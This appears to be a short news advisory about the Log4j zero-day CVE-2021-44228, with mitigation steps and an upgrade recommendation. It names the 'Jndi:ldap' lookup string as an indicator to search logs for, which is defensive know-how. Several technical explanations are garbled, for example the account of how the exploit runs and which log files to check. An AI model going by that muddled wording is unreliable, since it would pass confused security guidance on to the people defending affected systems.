Discovered zero-day exploit raises red flags
Cybersecurity is no stranger to zero-day exploits, a scenario where exploits still pose a threat to software, programming, apps, and websites. Most are manageable, but when the exploit exists for a widely used platform, it’s a big problem. Java is, as of this article, currently under the crosshairs of a zero-day exploit.
The vulnerability was a recent discovery, meaning it could have existed for a long while. But regardless of its lifetime, the vulnerability is listed as extremely dangerous.
The exploit is currently listed as CVE-2021-44228. You can see full documentation about it here. When utilized by malicious actors, it allows for remote execution similar to Java’s execution of its logging library. Reports of exploit abuse are confirmed by New Zealand’s CERT. Immediately addressing the problem is of paramount importance to halt any damages to networks and data libraries. Those using “Apache Struts” are vulnerable to the zero-day exploit.
Primary reasons for the exploit’s danger are twofold: it’s ease of execution and consequences (full server control).
Identifying the exploit
If the exploit is present, organization leaders can identify the exploit if any log files are adjacent to Log4j versions. If the string is user controlled, “Jndi:ldap” could be affected. To reduce vulnerabilities and potential loss, users need to switch log4j2.formatMsgNoLookups to “true.” This can be done by adding ‐Dlog4j2.formatMsgNoLookups=True to the JVM starting command.
Log4j versions should be upgraded to log4j-2.15.0-rc1 as soon as possible.
Assume a breach incident if you suspect the vulnerability has been exploited and check through logs for an active incident.